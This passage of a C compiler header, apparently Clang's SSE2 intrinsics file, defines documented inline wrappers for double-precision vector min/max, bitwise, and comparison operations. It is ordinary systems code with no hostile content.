                                                        __m128d __b) {
  return __builtin_ia32_minsd((__v2df)__a, (__v2df)__b);
}

/// Performs element-by-element comparison of the two 128-bit vectors of
///    [2 x double] and returns a vector containing the lesser of each pair of
///    values.
///
///    If either value in a comparison is NaN, returns the value from \a __b.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMINPD / MINPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing one of the operands.
/// \param __b
///    A 128-bit vector of [2 x double] containing one of the operands.
/// \returns A 128-bit vector of [2 x double] containing the minimum values
///    between both operands.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_min_pd(__m128d __a,
                                                        __m128d __b) {
  return __builtin_ia32_minpd((__v2df)__a, (__v2df)__b);
}

/// Compares lower 64-bit double-precision values of both operands, and
///    returns the greater of the pair of values in the lower 64-bits of the
///    result. The upper 64 bits of the result are copied from the upper
///    double-precision value of the first operand.
///
///    If either value in a comparison is NaN, returns the value from \a __b.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMAXSD / MAXSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing one of the operands. The
///    lower 64 bits of this operand are used in the comparison.
/// \param __b
///    A 128-bit vector of [2 x double] containing one of the operands. The
///    lower 64 bits of this operand are used in the comparison.
/// \returns A 128-bit vector of [2 x double] whose lower 64 bits contain the
///    maximum value between both operands. The upper 64 bits are copied from
///    the upper 64 bits of the first source operand.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_max_sd(__m128d __a,
                                                        __m128d __b) {
  return __builtin_ia32_maxsd((__v2df)__a, (__v2df)__b);
}

/// Performs element-by-element comparison of the two 128-bit vectors of
///    [2 x double] and returns a vector containing the greater of each pair
///    of values.
///
///    If either value in a comparison is NaN, returns the value from \a __b.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMAXPD / MAXPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing one of the operands.
/// \param __b
///    A 128-bit vector of [2 x double] containing one of the operands.
/// \returns A 128-bit vector of [2 x double] containing the maximum values
///    between both operands.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_max_pd(__m128d __a,
                                                        __m128d __b) {
  return __builtin_ia32_maxpd((__v2df)__a, (__v2df)__b);
}

/// Performs a bitwise AND of two 128-bit vectors of [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPAND / PAND &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing one of the source operands.
/// \param __b
///    A 128-bit vector of [2 x double] containing one of the source operands.
/// \returns A 128-bit vector of [2 x double] containing the bitwise AND of the
///    values between both operands.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_and_pd(__m128d __a,
                                                                  __m128d __b) {
  return (__m128d)((__v2du)__a &amp; (__v2du)__b);
}

/// Performs a bitwise AND of two 128-bit vectors of [2 x double], using
///    the one's complement of the values contained in the first source operand.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPANDN / PANDN &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing the left source operand. The
///    one's complement of this value is used in the bitwise AND.
/// \param __b
///    A 128-bit vector of [2 x double] containing the right source operand.
/// \returns A 128-bit vector of [2 x double] containing the bitwise AND of the
///    values in the second operand and the one's complement of the first
///    operand.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_andnot_pd(__m128d __a, __m128d __b) {
  return (__m128d)(~(__v2du)__a &amp; (__v2du)__b);
}

/// Performs a bitwise OR of two 128-bit vectors of [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPOR / POR &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing one of the source operands.
/// \param __b
///    A 128-bit vector of [2 x double] containing one of the source operands.
/// \returns A 128-bit vector of [2 x double] containing the bitwise OR of the
///    values between both operands.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_or_pd(__m128d __a,
                                                                 __m128d __b) {
  return (__m128d)((__v2du)__a | (__v2du)__b);
}

/// Performs a bitwise XOR of two 128-bit vectors of [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPXOR / PXOR &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing one of the source operands.
/// \param __b
///    A 128-bit vector of [2 x double] containing one of the source operands.
/// \returns A 128-bit vector of [2 x double] containing the bitwise XOR of the
///    values between both operands.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_xor_pd(__m128d __a,
                                                                  __m128d __b) {
  return (__m128d)((__v2du)__a ^ (__v2du)__b);
}

/// Compares each of the corresponding double-precision values of the
///    128-bit vectors of [2 x double] for equality.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns false.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPEQPD / CMPEQPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \param __b
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector containing the comparison results.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpeq_pd(__m128d __a,
                                                          __m128d __b) {
  return (__m128d)__builtin_ia32_cmpeqpd((__v2df)__a, (__v2df)__b);
}

/// Compares each of the corresponding double-precision values of the
///    128-bit vectors of [2 x double] to determine if the values in the first
///    operand are less than those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns false.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPLTPD / CMPLTPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \param __b
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector containing the comparison results.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmplt_pd(__m128d __a,
                                                          __m128d __b) {
  return (__m128d)__builtin_ia32_cmpltpd((__v2df)__a, (__v2df)__b);
}

/// Compares each of the corresponding double-precision values of the
///    128-bit vectors of [2 x double] to determine if the values in the first
///    operand are less than or equal to those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns false.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPLEPD / CMPLEPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \param __b
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector containing the comparison results.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmple_pd(__m128d __a,
                                                          __m128d __b) {
  return (__m128d)__builtin_ia32_cmplepd((__v2df)__a, (__v2df)__b);
}

/// Compares each of the corresponding double-precision values of the
///    128-bit vectors of [2 x double] to determine if the values in the first
///    operand are greater than those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns false.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPLTPD / CMPLTPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \param __b
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector containing the comparison results.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpgt_pd(__m128d __a,
                                                          __m128d __b) {
  return (__m128d)__builtin_ia32_cmpltpd((__v2df)__b, (__v2df)__a);
}

/// Compares each of the corresponding double-precision values of the
///    128-bit vectors of [2 x double] to determine if the values in the first
///    operand are greater than or equal to those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns false.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPLEPD / CMPLEPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \param __b
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector containing the comparison results.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpge_pd(__m128d __a,
                                                          __m128d __b) {
  return (__m128d)__builtin_ia32_cmplepd((__v2df)__b, (__v2df)__a);
}

/// Compares each of the corresponding double-precision values of the
///    128-bit vectors of [2 x double] to determine if the values in the first
///    operand are ordered with respect to those in the second operand.
///
///    A pair of double-precision values are ordered with respect to each
///    other if neither value is a NaN. Each comparison returns 0x0 for false,
///    0xFFFFFFFFFFFFFFFF for true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPORDPD / CMPORDPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \param __b
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector containing the comparison results.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpord_pd(__m128d __a,
                                                           __m128d __b) {
  return (__m128d)__builtin_ia32_cmpordpd((__v2df)__a, (__v2df)__b);
}

/// Compares each of the corresponding double-precision values of the
///    128-bit vectors of [2 x double] to determine if the values in the first
///    operand are unordered with respect to those in the second operand.
///
///    A pair of double-precision values are unordered with respect to each
///    other if one or both values are NaN. Each comparison returns 0x0 for
///    false, 0xFFFFFFFFFFFFFFFF for true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPUNORDPD / CMPUNORDPD &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \param __b
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector containing the comparison results.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpunord_pd(__m128d __a,
                                                             __m128d __b) {
  return (__m128d)__builtin_ia32_cmpunordpd((__v2df)__a, (__v2df)__b);
}

/// Compares each of the corresponding double-precision values of the
///    128-bit vectors of [2 x double] to determine if the values in the first
///    operand are unequal to those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPNEQPD / CMPNEQPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \param __b
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector containing the comparison results.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpneq_pd(__m128d __a,
                                                           __m128d __b) {
  return (__m128d)__builtin_ia32_cmpneqpd((__v2df)__a, (__v2df)__b);
}

/// Compares each of the corresponding double-precision values of the
///    128-bit vectors of [2 x double] to determine if the values in the first
///    operand are not less than those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPNLTPD / CMPNLTPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \param __b
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector containing the comparison results.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpnlt_pd(__m128d __a,
                                                           __m128d __b) {
  return (__m128d)__builtin_ia32_cmpnltpd((__v2df)__a, (__v2df)__b);
}

/// Compares each of the corresponding double-precision values of the
///    128-bit vectors of [2 x double] to determine if the values in the first
///    operand are not less than or equal to those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPNLEPD / CMPNLEPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \param __b
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector containing the comparison results.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpnle_pd(__m128d __a,
                                                           __m128d __b) {
  return (__m128d)__builtin_ia32_cmpnlepd((__v2df)__a, (__v2df)__b);
}

/// Compares each of the corresponding double-precision values of the
///    128-bit vectors of [2 x double] to determine if the values in the first
///    operand are not greater than those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPNLTPD / CMPNLTPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \param __b
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector containing the comparison results.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpngt_pd(__m128d __a,
                                                           __m128d __b) {
  return (__m128d)__builtin_ia32_cmpnltpd((__v2df)__b, (__v2df)__a);
}

/// Compares each of the corresponding double-precision values of the
///    128-bit vectors of [2 x double] to determine if the values in the first
///    operand are not greater than or equal to those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPNLEPD / CMPNLEPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \param __b
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector containing the comparison results.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpnge_pd(__m128d __a,
                                                           __m128d __b) {
  return (__m128d)__builtin_ia32_cmpnlepd((__v2df)__b, (__v2df)__a);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] for equality.
///
///    The comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns false.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPEQSD / CMPEQSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns A 128-bit vector. The lower 64 bits contains the comparison
///    results. The upper 64 bits are copied from the upper 64 bits of \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpeq_sd(__m128d __a,
                                                          __m128d __b) {
  return (__m128d)__builtin_ia32_cmpeqsd((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is less than the corresponding value in
///    the second parameter.
///
///    The comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns false.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPLTSD / CMPLTSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns A 128-bit vector. The lower 64 bits contains the comparison
///    results. The upper 64 bits are copied from the upper 64 bits of \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmplt_sd(__m128d __a,
                                                          __m128d __b) {
  return (__m128d)__builtin_ia32_cmpltsd((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is less than or equal to the
///    corresponding value in the second parameter.
///
///    The comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns false.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPLESD / CMPLESD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns A 128-bit vector. The lower 64 bits contains the comparison
///    results. The upper 64 bits are copied from the upper 64 bits of \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmple_sd(__m128d __a,
                                                          __m128d __b) {
  return (__m128d)__builtin_ia32_cmplesd((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is greater than the corresponding value
///    in the second parameter.
///
///    The comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns false.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPLTSD / CMPLTSD &lt;/c&gt; instruction.
///
/// \param __a
///     A 128-bit vector of [2 x double]. The lower double-precision value is
///     compared to the lower double-precision value of \a __b.
/// \param __b
///     A 128-bit vector of [2 x double]. The lower double-precision value is
///     compared to the lower double-precision value of \a __a.
/// \returns A 128-bit vector. The lower 64 bits contains the comparison
///     results. The upper 64 bits are copied from the upper 64 bits of \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpgt_sd(__m128d __a,
                                                          __m128d __b) {
  __m128d __c = __builtin_ia32_cmpltsd((__v2df)__b, (__v2df)__a);
  return __extension__(__m128d){__c[0], __a[1]};
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is greater than or equal to the
///    corresponding value in the second parameter.
///
///    The comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns false.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPLESD / CMPLESD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns A 128-bit vector. The lower 64 bits contains the comparison
///    results. The upper 64 bits are copied from the upper 64 bits of \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpge_sd(__m128d __a,
                                                          __m128d __b) {
  __m128d __c = __builtin_ia32_cmplesd((__v2df)__b, (__v2df)__a);
  return __extension__(__m128d){__c[0], __a[1]};
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is ordered with respect to the
///    corresponding value in the second parameter.
///
///    The comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true. A pair
///    of double-precision values are ordered with respect to each other if
///    neither value is a NaN.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPORDSD / CMPORDSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns A 128-bit vector. The lower 64 bits contains the comparison
///    results. The upper 64 bits are copied from the upper 64 bits of \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpord_sd(__m128d __a,
                                                           __m128d __b) {
  return (__m128d)__builtin_ia32_cmpordsd((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is unordered with respect to the
///    corresponding value in the second parameter.
///
///    The comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true. A pair
///    of double-precision values are unordered with respect to each other if
///    one or both values are NaN.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPUNORDSD / CMPUNORDSD &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns A 128-bit vector. The lower 64 bits contains the comparison
///    results. The upper 64 bits are copied from the upper 64 bits of \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpunord_sd(__m128d __a,
                                                             __m128d __b) {
  return (__m128d)__builtin_ia32_cmpunordsd((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is unequal to the corresponding value in
///    the second parameter.
///
///    The comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPNEQSD / CMPNEQSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns A 128-bit vector. The lower 64 bits contains the comparison
///    results. The upper 64 bits are copied from the upper 64 bits of \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpneq_sd(__m128d __a,
                                                           __m128d __b) {
  return (__m128d)__builtin_ia32_cmpneqsd((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is not less than the corresponding
///    value in the second parameter.
///
///    The comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPNLTSD / CMPNLTSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns A 128-bit vector. The lower 64 bits contains the comparison
///    results. The upper 64 bits are copied from the upper 64 bits of \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpnlt_sd(__m128d __a,
                                                           __m128d __b) {
  return (__m128d)__builtin_ia32_cmpnltsd((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is not less than or equal to the
///    corresponding value in the second parameter.
///
///    The comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPNLESD / CMPNLESD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns  A 128-bit vector. The lower 64 bits contains the comparison
///    results. The upper 64 bits are copied from the upper 64 bits of \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpnle_sd(__m128d __a,
                                                           __m128d __b) {
  return (__m128d)__builtin_ia32_cmpnlesd((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is not greater than the corresponding
///    value in the second parameter.
///
///    The comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPNLTSD / CMPNLTSD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns A 128-bit vector. The lower 64 bits contains the comparison
///    results. The upper 64 bits are copied from the upper 64 bits of \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpngt_sd(__m128d __a,
                                                           __m128d __b) {
  __m128d __c = __builtin_ia32_cmpnltsd((__v2df)__b, (__v2df)__a);
  return __extension__(__m128d){__c[0], __a[1]};
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is not greater than or equal to the
///    corresponding value in the second parameter.
///
///    The comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, returns true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCMPNLESD / CMPNLESD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns A 128-bit vector. The lower 64 bits contains the comparison
///    results. The upper 64 bits are copied from the upper 64 bits of \a __a.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_cmpnge_sd(__m128d __a,
                                                           __m128d __b) {
  __m128d __c = __builtin_ia32_cmpnlesd((__v2df)__b, (__v2df)__a);
  return __extension__(__m128d){__c[0], __a[1]};
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] for equality.
///
///    The comparison returns 0 for false, 1 for true. If either value in a
///    comparison is NaN, returns 0.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCOMISD / COMISD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns An integer containing the comparison results.
static __inline__ int __DEFAULT_FN_ATTRS _mm_comieq_sd(__m128d __a,
                                                       __m128d __b) {
  return __builtin_ia32_comisdeq((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is less than the corresponding value in
///    the second parameter.
///
///    The comparison returns 0 for false, 1 for true. If either value in a
///    comparison is NaN, returns 0.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCOMISD / COMISD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns An integer containing the comparison results.
static __inline__ int __DEFAULT_FN_ATTRS _mm_comilt_sd(__m128d __a,
                                                       __m128d __b) {
  return __builtin_ia32_comisdlt((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is less than or equal to the
///    corresponding value in the second parameter.
///
///    The comparison returns 0 for false, 1 for true. If either value in a
///    comparison is NaN, returns 0.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCOMISD / COMISD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///     A 128-bit vector of [2 x double]. The lower double-precision value is
///     compared to the lower double-precision value of \a __a.
/// \returns An integer containing the comparison results.
static __inline__ int __DEFAULT_FN_ATTRS _mm_comile_sd(__m128d __a,
                                                       __m128d __b) {
  return __builtin_ia32_comisdle((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is greater than the corresponding value
///    in the second parameter.
///
///    The comparison returns 0 for false, 1 for true. If either value in a
///    comparison is NaN, returns 0.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCOMISD / COMISD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns An integer containing the comparison results.
static __inline__ int __DEFAULT_FN_ATTRS _mm_comigt_sd(__m128d __a,
                                                       __m128d __b) {
  return __builtin_ia32_comisdgt((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
